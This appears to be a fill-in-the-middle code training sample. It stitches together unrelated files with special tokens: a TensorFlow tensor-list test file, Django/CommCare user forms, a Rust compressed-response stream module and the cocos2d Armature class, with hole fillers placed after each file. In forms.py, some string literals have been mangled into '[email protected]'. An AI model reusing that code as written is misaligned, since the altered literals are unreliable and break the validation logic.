self.assertAllEqual(self.evaluate(t).shape, (0, 2)) def testConcatEmptyListWithUnknownElementShapeFails(self): l = list_ops.empty_tensor_list( element_dtype=dtypes.float32, element_shape=None) with self.assertRaisesRegexp( errors.InvalidArgumentError, "All except the first dimension must be fully" " defined when concating an empty tensor list"): t = list_ops.tensor_list_concat(l, element_dtype=dtypes.float32) self.evaluate(t) def testConcatEmptyListWithPartiallyDefinedElementShapeFails(self): l = list_ops.empty_tensor_list( element_dtype=dtypes.float32, element_shape=[2, None]) with self.assertRaisesRegexp( errors.InvalidArgumentError, "All except the first dimension must be fully" " defined when concating an empty tensor list"): t = list_ops.tensor_list_concat(l, element_dtype=dtypes.float32) self.evaluate(t) def testConcatListWithScalarElementShapeFails(self): l = list_ops.empty_tensor_list( element_dtype=dtypes.float32, element_shape=tensor_shape.scalar()) with self.assertRaisesRegexp( errors.InvalidArgumentError, "Concat requires elements to be at least vectors, " "found scalars instead"): t = list_ops.tensor_list_concat(l, element_dtype=dtypes.float32) self.evaluate(t) def testConcatListWithScalarElementsFails(self): l = list_ops.empty_tensor_list( element_dtype=dtypes.float32, element_shape=None) l1 = list_ops.tensor_list_push_back(l, 1.) with self.assertRaisesRegexp( errors.InvalidArgumentError, "Concat saw a scalar shape at index 0" " but requires at least vectors"): t = list_ops.tensor_list_concat(l1, element_dtype=dtypes.float32) self.evaluate(t) l1 = list_ops.tensor_list_push_back(l, [1.]) l1 = list_ops.tensor_list_push_back(l1, 2.) with self.assertRaisesRegexp( errors.InvalidArgumentError, "Concat saw a scalar shape at index 1" " but requires at least vectors"): t = list_ops.tensor_list_concat(l1, element_dtype=dtypes.float32) self.evaluate(t) def testEvenSplit(self): def RunTest(input_tensor, lengths, expected_stacked_output): l = list_ops.tensor_list_split( input_tensor, element_shape=None, lengths=lengths) self.assertAllEqual( list_ops.tensor_list_stack(l, element_dtype=dtypes.float32), expected_stacked_output) RunTest([1., 2., 3.], [1, 1, 1], [[1.], [2.], [3.]]) RunTest([1., 2., 3., 4.], [2, 2], [[1., 2.], [3., 4.]]) RunTest([[1., 2.], [3., 4.]], [1, 1], [[[1., 2.]], [[3., 4.]]]) def testUnevenSplit(self): l = list_ops.tensor_list_split([1., 2., 3., 4., 5], element_shape=None, lengths=[3, 2]) self.assertAllEqual(list_ops.tensor_list_length(l), 2) self.assertAllEqual( list_ops.tensor_list_get_item(l, 0, element_dtype=dtypes.float32), [1., 2., 3.]) self.assertAllEqual( list_ops.tensor_list_get_item(l, 1, element_dtype=dtypes.float32), [4., 5.]) @test_util.run_deprecated_v1 def testSkipEagerSplitWithInvalidTensorShapeFails(self): with self.cached_session(): tensor = array_ops.placeholder(dtype=dtypes.float32) l = list_ops.tensor_list_split(tensor, element_shape=None, lengths=[1]) with self.assertRaisesRegexp( errors.InvalidArgumentError, r"Tensor must be at least a vector, but saw shape: \[\]"): l.eval({tensor: 1}) @test_util.run_deprecated_v1 def testSkipEagerSplitWithInvalidLengthsShapeFails(self): with self.cached_session(): lengths = array_ops.placeholder(dtype=dtypes.int64) l = list_ops.tensor_list_split([1., 2.], element_shape=None, lengths=lengths) with self.assertRaisesRegexp( errors.InvalidArgumentError, r"Expected lengths to be a vector, received shape: \[\]"): l.eval({lengths: 1}) def testSplitWithInvalidLengthsFails(self): with self.assertRaisesRegexp(errors.InvalidArgumentError, r"Invalid value in lengths: -1"): l = list_ops.tensor_list_split([1., 2.], element_shape=None, lengths=[1, -1]) self.evaluate(l) with self.assertRaisesRegexp( errors.InvalidArgumentError, r"Attempting to slice \[0, 3\] from tensor with length 2"): l = list_ops.tensor_list_split([1., 2.], element_shape=None, lengths=[3]) self.evaluate(l) with self.assertRaisesRegexp( errors.InvalidArgumentError, r"Unused values in tensor. Length of tensor: 2 Values used: 1"): l = list_ops.tensor_list_split([1., 2.], element_shape=None, lengths=[1]) self.evaluate(l) @test_util.run_deprecated_v1 def testSkipEagerSplitWithScalarElementShapeFails(self): with self.assertRaisesRegexp(ValueError, r"Shapes must be equal rank, but are 1 and 0"): l = list_ops.tensor_list_split([1., 2.], element_shape=[], lengths=[1, 1]) with self.cached_session(): with self.assertRaisesRegexp( errors.InvalidArgumentError, r"TensorListSplit requires element_shape to be at least of rank 1, " r"but saw: \[\]"): element_shape = array_ops.placeholder(dtype=dtypes.int32) l = list_ops.tensor_list_split([1., 2.], element_shape=element_shape, lengths=[1, 1]) l.eval({element_shape: []}) def testEagerOnlySplitWithScalarElementShapeFails(self): if context.executing_eagerly(): with self.assertRaisesRegexp( errors.InvalidArgumentError, r"TensorListSplit requires element_shape to be at least of rank 1, " r"but saw: \[\]"): list_ops.tensor_list_split([1., 2.], element_shape=[], lengths=[1, 1]) @test_util.run_deprecated_v1 def testSkipEagerSplitWithIncompatibleTensorShapeAndElementShapeFails(self): with self.assertRaisesRegexp(ValueError, r"Shapes must be equal rank, but are 2 and 1"): l = list_ops.tensor_list_split([[1.], [2.]], element_shape=[1], lengths=[1, 1]) with self.cached_session(): with self.assertRaisesRegexp( errors.InvalidArgumentError, r"tensor shape \[2,1\] is not compatible with element_shape \[1\]"): element_shape = array_ops.placeholder(dtype=dtypes.int32) l = list_ops.tensor_list_split([[1.], [2.]], element_shape=element_shape, lengths=[1, 1]) l.eval({element_shape: [1]}) def testEagerOnlySplitWithIncompatibleTensorShapeAndElementShapeFails(self): if context.executing_eagerly(): with self.assertRaisesRegexp( errors.InvalidArgumentError, r"tensor shape \[2,1\] is not compatible with element_shape \[1\]"): list_ops.tensor_list_split([[1.], [2.]], element_shape=[1], lengths=[1, 1]) def testResizeGrow(self): l = list_ops.tensor_list_from_tensor([1., 2.], element_shape=[]) l = list_ops.tensor_list_resize(l, 4) self.assertEqual(self.evaluate(list_ops.tensor_list_length(l)), 4) self.assertEqual( self.evaluate( list_ops.tensor_list_get_item(l, 0, element_dtype=dtypes.float32)), 1.) self.assertEqual( self.evaluate( list_ops.tensor_list_get_item(l, 1, element_dtype=dtypes.float32)), 2.) def testResizeShrink(self): l = list_ops.tensor_list_from_tensor([1., 2., 3.], element_shape=[]) l = list_ops.tensor_list_resize(l, 2) self.assertEqual(self.evaluate(list_ops.tensor_list_length(l)), 2) self.assertAllEqual( self.evaluate( list_ops.tensor_list_stack(l, element_dtype=dtypes.float32)), [1., 2.]) def testResizeWithInvalidSizeFails(self): with self.assertRaisesRegexp( errors.InvalidArgumentError, "TensorListSlice expects size to be non-negative"): l = list_ops.tensor_list_from_tensor([1., 2., 3.], element_shape=[]) l = list_ops.tensor_list_resize(l, -1) self.evaluate(l) @test_util.run_deprecated_v1 @test_util.enable_control_flow_v2 def testSkipEagerResizeGrad(self): t = constant_op.constant([1., 2., 3.]) l = list_ops.tensor_list_from_tensor(t, element_shape=[]) l = list_ops.tensor_list_set_item( l, 3, 4., resize_if_index_out_of_bounds=True) t1 = list_ops.tensor_list_stack(l, element_dtype=dtypes.float32) grad = gradients_impl.gradients(t1, t)[0] self.assertAllEqual(self.evaluate(grad), [1., 1., 1.]) if __name__ == "__main__": test.main()<|fim▁end|>
a = list_ops.tensor_list_push_back(a, l1) a = list_ops.tensor_list_push_back(a, l2) b = list_ops.empty_tensor_list( element_dtype=dtypes.variant, element_shape=[])
<|file_name|>forms.py<|end_file_name|><|fim▁begin|>from crispy_forms.bootstrap import FormActions from crispy_forms.helper import FormHelper from crispy_forms.layout import ButtonHolder, Div, Fieldset, HTML, Layout, Submit from django import forms from django.core.validators import EmailValidator, email_re from django.core.urlresolvers import reverse from django.forms.widgets import PasswordInput, HiddenInput from django.utils.safestring import mark_safe from django.utils.translation import ugettext as _, ugettext_noop, ugettext_lazy from django.template.loader import get_template from django.template import Context from corehq.apps.locations.models import Location from corehq.apps.users.models import CouchUser from corehq.apps.users.util import format_username from corehq.apps.app_manager.models import validate_lang from corehq.apps.commtrack.models import CommTrackUser, Program import re # required to translate inside of a mark_safe tag from django.utils.functional import lazy import six # Python 3 compatibility mark_safe_lazy = lazy(mark_safe, six.text_type) def wrapped_language_validation(value): try: validate_lang(value) except ValueError: raise forms.ValidationError("%s is not a valid language code! Please " "enter a valid two or three digit code." % value) class LanguageField(forms.CharField): """ Adds language code validation to a field """ def __init__(self, *args, **kwargs): super(LanguageField, self).__init__(*args, **kwargs) self.min_length = 2 self.max_length = 3 default_error_messages = { 'invalid': _(u'Please enter a valid two or three digit language code.'), } default_validators = [wrapped_language_validation] class BaseUpdateUserForm(forms.Form): @property def direct_properties(self): return [] def update_user(self, existing_user=None, **kwargs): is_update_successful = False if not existing_user and 'email' in self.cleaned_data: from django.contrib.auth.models import User django_user = User() django_user.username = self.cleaned_data['email'] django_user.save() existing_user = CouchUser.from_django_user(django_user) existing_user.save() is_update_successful = True for prop in self.direct_properties: setattr(existing_user, prop, self.cleaned_data[prop]) is_update_successful = True if is_update_successful: existing_user.save() return is_update_successful def initialize_form(self, existing_user=None, **kwargs): if existing_user is None: return for prop in self.direct_properties: self.initial[prop] = getattr(existing_user, prop, "") class UpdateUserRoleForm(BaseUpdateUserForm): role = forms.ChoiceField(choices=(), required=False) def update_user(self, existing_user=None, domain=None, **kwargs): is_update_successful = super(UpdateUserRoleForm, self).update_user(existing_user) if domain and 'role' in self.cleaned_data: role = self.cleaned_data['role'] try: existing_user.set_role(domain, role) existing_user.save() is_update_successful = True except KeyError: pass return is_update_successful def load_roles(self, role_choices=None, current_role=None): if role_choices is None: role_choices = [] self.fields['role'].choices = role_choices if current_role: self.initial['role'] = current_role class BaseUserInfoForm(forms.Form): first_name = forms.CharField(label=ugettext_lazy('First Name'), max_length=50, required=False) last_name = forms.CharField(label=ugettext_lazy('Last Name'), max_length=50, required=False) email = forms.EmailField(label=ugettext_lazy("E-mail"), max_length=75, required=False) language = forms.ChoiceField( choices=(), initial=None, required=False, help_text=mark_safe_lazy( ugettext_lazy( "<i class=\"icon-info-sign\"></i> " "Becomes default language seen in CloudCare and reports (if applicable). " "Supported languages for reports are en, fr (partial), and hin (partial)." ) ) ) def load_language(self, language_choices=None): if language_choices is None: language_choices = [] self.fields['language'].choices = [('', '')] + language_choices class UpdateMyAccountInfoForm(BaseUpdateUserForm, BaseUserInfoForm): email_opt_out = forms.BooleanField( required=False, label="", help_text=ugettext_lazy("Opt out of emails about new features and other CommCare updates.") ) @property def direct_properties(self): return self.fields.keys() class UpdateCommCareUserInfoForm(BaseUserInfoForm, UpdateUserRoleForm): @property def direct_properties(self): indirect_props = ['role'] return [k for k in self.fields.keys() if k not in indirect_props] class RoleForm(forms.Form): def __init__(self, *args, **kwargs): if kwargs.has_key('role_choices'): role_choices = kwargs.pop('role_choices') else: role_choices = () super(RoleForm, self).__init__(*args, **kwargs) self.fields['role'].choices = role_choices class Meta: app_label = 'users' class CommCareAccountForm(forms.Form): """ Form for CommCareAccounts """ # 128 is max length in DB # 25 is domain max length # @{domain}.commcarehq.org adds 16 # left over is 87 and 80 just sounds better max_len_username = 80 username = forms.CharField(max_length=max_len_username, required=True) password = forms.CharField(widget=PasswordInput(), required=True, min_length=1, help_text="Only numbers are allowed in passwords") password_2 = forms.CharField(label='Password (reenter)', widget=PasswordInput(), required=True, min_length=1) domain = forms.CharField(widget=HiddenInput()) phone_number = forms.CharField(max_length=80, required=False) class Meta: app_label = 'users' def __init__(self, *args, **kwargs): super(forms.Form, self).__init__(*args, **kwargs) self.helper = FormHelper() self.helper.layout = Layout( Fieldset( 'Create new Mobile Worker account', 'username', 'password', HTML("{% if only_numeric %}" "<div class=\"control-group\"><div class=\"controls\">" "To enable alphanumeric passwords, go to the " "applications this user will use, go to CommCare " "Settings, and change Password Format to Alphanumeric." "</div></div>" "{% endif %}" ), 'password_2', 'phone_number', Div( Div(HTML("Please enter number, including international code, in digits only."), css_class="controls"), css_class="control-group" ) ), FormActions( ButtonHolder( Submit('submit', 'Create Mobile Worker') ) ) ) def clean_phone_number(self): phone_number = self.cleaned_data['phone_number'] phone_number = re.sub('\s|\+|\-', '', phone_number) if phone_number == '': return None elif not re.match(r'\d+$', phone_number): raise forms.ValidationError(_("%s is an invalid phone number." % phone_number)) return phone_number def clean_username(self): username = self.cleaned_data['username'] if username == 'admin' or username == 'demo_user': raise forms.ValidationError("The username %s is reserved for CommCare." % username) return username def clean(self): try: password = self.cleaned_data['password'] password_2 = self.cleaned_data['password_2'] except KeyError: pass else: if password != password_2: raise forms.ValidationError("Passwords do not match") if self.password_format == 'n' and not password.isnumeric(): raise forms.ValidationError("Password is not numeric") try: username = self.cleaned_data['username'] except KeyError: pass else: if len(username) > CommCareAccountForm.max_len_username: raise forms.ValidationError( "Username %s is too long. Must be under %d characters." % (username, CommCareAccountForm.max_len_username)) validate_username('%[email protected]' % username) domain = self.cleaned_data['domain'] username = format_username(username, domain) num_couch_users = len(CouchUser.view("users/by_username", key=username)) if num_couch_users > 0: raise forms.ValidationError("CommCare user already exists") # set the cleaned username to [email protected] self.cleaned_data['username'] = username return self.cleaned_data validate_username = EmailValidator(email_re, _(u'Username contains invalid characters.'), 'invalid') class MultipleSelectionForm(forms.Form): """ Form for selecting groups (used by the group UI on the user page) """ selected_ids = forms.MultipleChoiceField( label="", required=False, ) def __init__(self, *args, **kwargs): self.helper = FormHelper() self.helper.form_tag = False self.helper.add_input(Submit('submit', 'Update')) super(MultipleSelectionForm, self).__init__(*args, **kwargs) class SupplyPointSelectWidget(forms.Widget): def __init__(self, attrs=None, domain=None, id='supply-point'): super(SupplyPointSelectWidget, self).__init__(attrs) self.domain = domain self.id = id def render(self, name, value, attrs=None): return get_template('locations/manage/partials/autocomplete_select_widget.html').render(Context({ 'id': self.id, 'name': name, 'value': value or '', 'query_url': reverse('corehq.apps.commtrack.views.api_query_supply_point', args=[self.domain]), })) class CommtrackUserForm(forms.Form): supply_point = forms.CharField(label='Supply Point:', required=False) program_id = forms.ChoiceField(label="Program", choices=(), required=False) def __init__(self, *args, **kwargs): domain = None if 'domain' in kwargs: domain = kwargs['domain']<|fim▁hole|> self.fields['supply_point'].widget = SupplyPointSelectWidget(domain=domain) programs = Program.by_domain(domain, wrap=False) choices = list((prog['_id'], prog['name']) for prog in programs) choices.insert(0, ('', '')) self.fields['program_id'].choices = choices def save(self, user): commtrack_user = CommTrackUser.wrap(user.to_json()) location_id = self.cleaned_data['supply_point'] if location_id: loc = Location.get(location_id) commtrack_user.clear_locations() commtrack_user.add_location(loc)<|fim▁end|>
del kwargs['domain'] super(CommtrackUserForm, self).__init__(*args, **kwargs)
<|file_name|>stream.rs<|end_file_name|><|fim▁begin|>/* * Copyright (c) Meta Platforms, Inc. and affiliates. * * This software may be used and distributed according to the terms of the * GNU General Public License version 2. */ use std::pin::Pin; use anyhow::Error; use async_compression::tokio::bufread::{GzipEncoder, ZstdEncoder}; use bytes::Bytes; use futures::{ future::Either, stream::{BoxStream, Stream, StreamExt, TryStreamExt}, task::{Context, Poll}, }; use pin_project::pin_project; use tokio_util::io::{ReaderStream, StreamReader}; use crate::content_encoding::{ContentCompression, ContentEncoding}; /// Create a response stream using the specified Content-Encoding. /// /// The resulting stream may or may not be compressed depending on the chosen encoding. Optionally, /// the caller can specify the value for the `Content-Length` header. This is only useful in cases /// where the response isn't compressed (i.e., the encoding is set to `ContentEncoding::Identity`) /// because otherwise, we would need to send the post-compression size of the content, which cannot /// be known in advance. pub fn encode_stream<S>( stream: S, encoding: ContentEncoding, length: Option<u64>, ) -> Either<ResponseStream<S>, CompressedResponseStream<'static>> where S: Stream<Item = Result<Bytes, Error>> + Send + 'static, { match (encoding, length) { (ContentEncoding::Identity, Some(size)) => ResponseStream::new(stream) .set_content_length(size) .left_stream(), (ContentEncoding::Identity, None) => ResponseStream::new(stream).left_stream(), (ContentEncoding::Compressed(c), _) => { CompressedResponseStream::new(stream, c).right_stream() } } } #[pin_project] pub struct CompressedResponseStream<'a> { inner: BoxStream<'a, Result<Bytes, Error>>, content_compression: ContentCompression, } impl<'a> CompressedResponseStream<'a> { pub fn new<S>(inner: S, content_compression: ContentCompression) -> Self where S: Stream<Item = Result<Bytes, Error>> + Send + 'a, { use std::io; // 2MiB, for LFS that's at least once every content chunk. const YIELD_EVERY: usize = 2 * 1024 * 1024; let inner = inner.map_err(|e| io::Error::new(io::ErrorKind::Other, e)); let inner = YieldStream::new(inner, YIELD_EVERY); let inner = StreamReader::new(inner); let inner = match content_compression { ContentCompression::Zstd => ReaderStream::new(ZstdEncoder::new(inner)) .map_err(Error::from) .boxed(), ContentCompression::Gzip => ReaderStream::new(GzipEncoder::new(inner)) .map_err(Error::from) .boxed(), }; Self { inner, content_compression, } } pub fn content_compression(&self) -> ContentCompression { self.content_compression } } impl Stream for CompressedResponseStream<'_> { type Item = Result<Bytes, Error>; fn poll_next(self: Pin<&mut Self>, ctx: &mut Context<'_>) -> Poll<Option<Self::Item>> { self.project().inner.poll_next_unpin(ctx) } } #[pin_project] pub struct ResponseStream<S> { #[pin] inner: S, content_length: Option<u64>, } impl<S> ResponseStream<S> { pub fn new(inner: S) -> Self { Self { inner, content_length: None, } } /// Set a Content-Length for this stream. This *must* match the exact size of the uncompressed /// content that will be sent, since that is what the client will expect. pub fn set_content_length(self, content_length: u64) -> Self { Self { content_length: Some(content_length), ..self } } pub fn content_length(&self) -> Option<u64> { self.content_length } } impl<S> Stream for ResponseStream<S> where S: Stream, { type Item = S::Item; fn poll_next(self: Pin<&mut Self>, ctx: &mut Context<'_>) -> Poll<Option<Self::Item>> { self.project().inner.poll_next(ctx) } } /// This is a helper that forces the underlying stream to yield (i.e. return Pending) periodically. /// This is useful with compression, because our compression library will try to compress as much /// as it can. If the data is always ready (which it often is with e.g. LFS, where we have /// everything in cache most of the time), then it'll compress the entire stream before returning, /// which is good for compression performance, but terrible for time-to-first-byte. So, we force /// our compression to periodically stop compresing (every YIELD_EVERY). #[pin_project] pub struct YieldStream<S> { read: usize, yield_every: usize, #[pin] inner: S, } impl<S> YieldStream<S> { pub fn new(inner: S, yield_every: usize) -> Self { Self { read: 0, yield_every, inner, } } } impl<S, E> Stream for YieldStream<S> where S: Stream<Item = Result<Bytes, E>>, { type Item = Result<Bytes, E>; fn poll_next(self: Pin<&mut Self>, ctx: &mut Context<'_>) -> Poll<Option<Self::Item>> { let mut projection = self.project(); if *projection.read >= *projection.yield_every { *projection.read %= *projection.yield_every; ctx.waker().wake_by_ref(); return Poll::Pending;<|fim▁hole|> *projection.read += bytes.len(); } Poll::Ready(ret) } } #[cfg(test)] mod test { use super::*; use futures::stream; #[tokio::test] async fn test_yield_stream() { // NOTE: This tests that the yield probably wakes up but assumes it yields. let data = &[b"foo".as_ref(), b"bar2".as_ref()]; let data = stream::iter( data.iter() .map(|d| Result::<_, ()>::Ok(Bytes::copy_from_slice(d))), ); let mut stream = YieldStream::new(data, 1); assert_eq!( stream.next().await, Some(Ok(Bytes::copy_from_slice(b"foo"))) ); assert!(stream.read > stream.yield_every); assert_eq!( stream.next().await, Some(Ok(Bytes::copy_from_slice(b"bar2"))) ); assert_eq!(stream.next().await, None,); } }<|fim▁end|>
} let ret = futures::ready!(projection.inner.poll_next_unpin(ctx)); if let Some(Ok(ref bytes)) = ret {
<|file_name|>CCArmature.js<|end_file_name|><|fim▁begin|>/**************************************************************************** Copyright (c) 2011-2012 cocos2d-x.org Copyright (c) 2013-2014 Chukong Technologies Inc. http://www.cocos2d-x.org Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ****************************************************************************/ /** * The main class of Armature, it plays armature animation, manages and updates bones' state. * @class * @extends ccs.Node * * @property {ccs.Bone} parentBone - The parent bone of the armature node * @property {ccs.ArmatureAnimation} animation - The animation * @property {ccs.ArmatureData} armatureData - The armature data * @property {String} name - The name of the armature * @property {cc.SpriteBatchNode} batchNode - The batch node of the armature * @property {Number} version - The version * @property {Object} body - The body of the armature * @property {ccs.ColliderFilter} colliderFilter - <@writeonly> The collider filter of the armature */ ccs.Armature = ccs.Node.extend(/** @lends ccs.Armature# */{ animation: null, armatureData: null, batchNode: null, _parentBone: null, _boneDic: null, _topBoneList: null, _armatureIndexDic: null, _offsetPoint: null, version: 0, _armatureTransformDirty: true, _body: null, _blendFunc: null, _className: "Armature", /** * Create a armature node. * Constructor of ccs.Armature * @param {String} name * @param {ccs.Bone} parentBone * @example * var armature = new ccs.Armature(); */ ctor: function (name, parentBone) { cc.Node.prototype.ctor.call(this); this._name = ""; this._topBoneList = []; this._armatureIndexDic = {}; this._offsetPoint = cc.p(0, 0); this._armatureTransformDirty = true; this._blendFunc = {src: cc.BLEND_SRC, dst: cc.BLEND_DST}; name && ccs.Armature.prototype.init.call(this, name, parentBone); // Hack way to avoid RendererWebGL from skipping Armature this._texture = {}; }, /** * Initializes a CCArmature with the specified name and CCBone * @param {String} [name] * @param {ccs.Bone} [parentBone] * @return {Boolean} */ init: function (name, parentBone) { if (parentBone) this._parentBone = parentBone; this.removeAllChildren(); this.animation = new ccs.ArmatureAnimation(); this.animation.init(this); this._boneDic = {}; this._topBoneList.length = 0; //this._name = name || ""; var armatureDataManager = ccs.armatureDataManager; var animationData; if (name !== "") { //animationData animationData = armatureDataManager.getAnimationData(name); cc.assert(animationData, "AnimationData not exist!"); this.animation.setAnimationData(animationData); //armatureData var armatureData = armatureDataManager.getArmatureData(name); cc.assert(armatureData, "ArmatureData not exist!"); this.armatureData = armatureData; //boneDataDic var boneDataDic = armatureData.getBoneDataDic(); for (var key in boneDataDic) { var bone = this.createBone(String(key)); //! init bone's Tween to 1st movement's 1st frame do { var movData = animationData.getMovement(animationData.movementNames[0]); if (!movData) break; var _movBoneData = movData.getMovementBoneData(bone.getName()); if (!_movBoneData || _movBoneData.frameList.length <= 0) break; var frameData = _movBoneData.getFrameData(0); if (!frameData) break; bone.getTweenData().copy(frameData); bone.changeDisplayWithIndex(frameData.displayIndex, false); } while (0); } this.update(0); this.updateOffsetPoint(); } else { name = "new_armature"; this.armatureData = new ccs.ArmatureData(); this.armatureData.name = name; animationData = new ccs.AnimationData(); animationData.name = name; armatureDataManager.addArmatureData(name, this.armatureData); armatureDataManager.addAnimationData(name, animationData); this.animation.setAnimationData(animationData); } this._renderCmd.initShaderCache(); this.setCascadeOpacityEnabled(true); this.setCascadeColorEnabled(true); return true; }, visit: function (parent) { var cmd = this._renderCmd, parentCmd = parent ? parent._renderCmd : null; // quick return if not visible if (!this._visible) { cmd._propagateFlagsDown(parentCmd); return; } cmd.visit(parentCmd); cmd._dirtyFlag = 0; }, addChild: function (child, localZOrder, tag) { if (child instanceof ccui.Widget) { cc.log("Armature doesn't support to add Widget as its child, it will be fix soon."); return; } cc.Node.prototype.addChild.call(this, child, localZOrder, tag); }, /** * create a bone with name * @param {String} boneName * @return {ccs.Bone} */ createBone: function (boneName) { var existedBone = this.getBone(boneName); if (existedBone) return existedBone; var boneData = this.armatureData.getBoneData(boneName); var parentName = boneData.parentName; var bone = null; if (parentName) { this.createBone(parentName); bone = new ccs.Bone(boneName); this.addBone(bone, parentName); } else { bone = new ccs.Bone(boneName); this.addBone(bone, ""); } bone.setBoneData(boneData); bone.getDisplayManager().changeDisplayWithIndex(-1, false); return bone; }, /** * Add a Bone to this Armature * @param {ccs.Bone} bone The Bone you want to add to Armature * @param {String} parentName The parent Bone's name you want to add to. If it's null, then set Armature to its parent */ addBone: function (bone, parentName) { cc.assert(bone, "Argument must be non-nil"); var locBoneDic = this._boneDic; if (bone.getName()) cc.assert(!locBoneDic[bone.getName()], "bone already added. It can't be added again"); if (parentName) { var boneParent = locBoneDic[parentName]; if (boneParent) boneParent.addChildBone(bone); else this._topBoneList.push(bone); } else this._topBoneList.push(bone); bone.setArmature(this); locBoneDic[bone.getName()] = bone; this.addChild(bone); }, /** * Remove a bone with the specified name. If recursion it will also remove child Bone recursively. * @param {ccs.Bone} bone The bone you want to remove * @param {Boolean} recursion Determine whether remove the bone's child recursion. */ removeBone: function (bone, recursion) { cc.assert(bone, "bone must be added to the bone dictionary!"); bone.setArmature(null); bone.removeFromParent(recursion); cc.arrayRemoveObject(this._topBoneList, bone); delete this._boneDic[bone.getName()]; this.removeChild(bone, true); }, /** * Gets a bone with the specified name * @param {String} name The bone's name you want to get * @return {ccs.Bone} */ getBone: function (name) { return this._boneDic[name]; }, /** * Change a bone's parent with the specified parent name. * @param {ccs.Bone} bone The bone you want to change parent * @param {String} parentName The new parent's name */ changeBoneParent: function (bone, parentName) { cc.assert(bone, "bone must be added to the bone dictionary!"); var parentBone = bone.getParentBone(); if (parentBone) { cc.arrayRemoveObject(parentBone.getChildren(), bone); bone.setParentBone(null); } if (parentName) { var boneParent = this._boneDic[parentName]; if (boneParent) { boneParent.addChildBone(bone); cc.arrayRemoveObject(this._topBoneList, bone); } else this._topBoneList.push(bone); } }, /** * Get CCArmature's bone dictionary * @return {Object} Armature's bone dictionary */ getBoneDic: function () { return this._boneDic; }, /** * Set contentSize and Calculate anchor point. */ updateOffsetPoint: function () { // Set contentsize and Calculate anchor point. var rect = this.getBoundingBox(); this.setContentSize(rect); var locOffsetPoint = this._offsetPoint; locOffsetPoint.x = -rect.x; locOffsetPoint.y = -rect.y; if (rect.width !== 0 && rect.height !== 0) this.setAnchorPoint(locOffsetPoint.x / rect.width, locOffsetPoint.y / rect.height); }, getOffsetPoints: function () { return {x: this._offsetPoint.x, y: this._offsetPoint.y}; }, /** * Sets animation to this Armature * @param {ccs.ArmatureAnimation} animation */ setAnimation: function (animation) { this.animation = animation; }, /** * Gets the animation of this Armature. * @return {ccs.ArmatureAnimation} */ getAnimation: function () { return this.animation; }, /** * armatureTransformDirty getter * @returns {Boolean} */ getArmatureTransformDirty: function () { return this._armatureTransformDirty; }, /** * The update callback of ccs.Armature, it updates animation's state and updates bone's state. * @override * @param {Number} dt */ update: function (dt) { this.animation.update(dt); var locTopBoneList = this._topBoneList; for (var i = 0; i < locTopBoneList.length; i++) locTopBoneList[i].update(dt); this._armatureTransformDirty = false; }, /** * The callback when ccs.Armature enter stage. * @override */ onEnter: function () { cc.Node.prototype.onEnter.call(this); this.scheduleUpdate(); }, /** * The callback when ccs.Armature exit stage. * @override */ onExit: function () { cc.Node.prototype.onExit.call(this); this.unscheduleUpdate(); }, /** * This boundingBox will calculate all bones' boundingBox every time * @returns {cc.Rect} */ getBoundingBox: function () { var minX, minY, maxX, maxY = 0; var first = true; var boundingBox = cc.rect(0, 0, 0, 0), locChildren = this._children; var len = locChildren.length; for (var i = 0; i < len; i++) { var bone = locChildren[i]; if (bone) { var r = bone.getDisplayManager().getBoundingBox(); if (r.x === 0 && r.y === 0 && r.width === 0 && r.height === 0) continue; if (first) { minX = r.x; minY = r.y; maxX = r.x + r.width; maxY = r.y + r.height; first = false; } else { minX = r.x < boundingBox.x ? r.x : boundingBox.x; minY = r.y < boundingBox.y ? r.y : boundingBox.y; maxX = r.x + r.width > boundingBox.x + boundingBox.width ? r.x + r.width : boundingBox.x + boundingBox.width; maxY = r.y + r.height > boundingBox.y + boundingBox.height ? r.y + r.height : boundingBox.y + boundingBox.height; } boundingBox.x = minX; boundingBox.y = minY; boundingBox.width = maxX - minX; boundingBox.height = maxY - minY; } } return cc.rectApplyAffineTransform(boundingBox, this.getNodeToParentTransform()); }, /** * when bone contain the point ,then return it. * @param {Number} x * @param {Number} y * @returns {ccs.Bone} */ getBoneAtPoint: function (x, y) { var locChildren = this._children; for (var i = locChildren.length - 1; i >= 0; i--) { var child = locChildren[i]; if (child instanceof ccs.Bone && child.getDisplayManager().containPoint(x, y)) return child; } return null; }, /** * Sets parent bone of this Armature * @param {ccs.Bone} parentBone */ setParentBone: function (parentBone) { this._parentBone = parentBone; var locBoneDic = this._boneDic; for (var key in locBoneDic) { locBoneDic[key].setArmature(this); } }, /** * Return parent bone of ccs.Armature. * @returns {ccs.Bone} */ getParentBone: function () { return this._parentBone; }, /** * draw contour */ drawContour: function () { cc._drawingUtil.setDrawColor(255, 255, 255, 255); cc._drawingUtil.setLineWidth(1); var locBoneDic = this._boneDic; for (var key in locBoneDic) { var bone = locBoneDic[key]; var detector = bone.getColliderDetector(); if (!detector) continue; var bodyList = detector.getColliderBodyList(); for (var i = 0; i < bodyList.length; i++) { var body = bodyList[i]; var vertexList = body.getCalculatedVertexList(); cc._drawingUtil.drawPoly(vertexList, vertexList.length, true); } } }, setBody: function (body) { if (this._body === body) return; this._body = body; this._body.data = this; var child, displayObject, locChildren = this._children; for (var i = 0; i < locChildren.length; i++) { child = locChildren[i]; if (child instanceof ccs.Bone) { var displayList = child.getDisplayManager().getDecorativeDisplayList(); for (var j = 0; j < displayList.length; j++) { displayObject = displayList[j]; var detector = displayObject.getColliderDetector(); if (detector) detector.setBody(this._body); } } } }, getShapeList: function () { if (this._body) return this._body.shapeList; return null; }, getBody: function () { return this._body; }, /** * Sets the blendFunc to ccs.Armature * @param {cc.BlendFunc|Number} blendFunc * @param {Number} [dst] */ setBlendFunc: function (blendFunc, dst) { if (dst === undefined) { 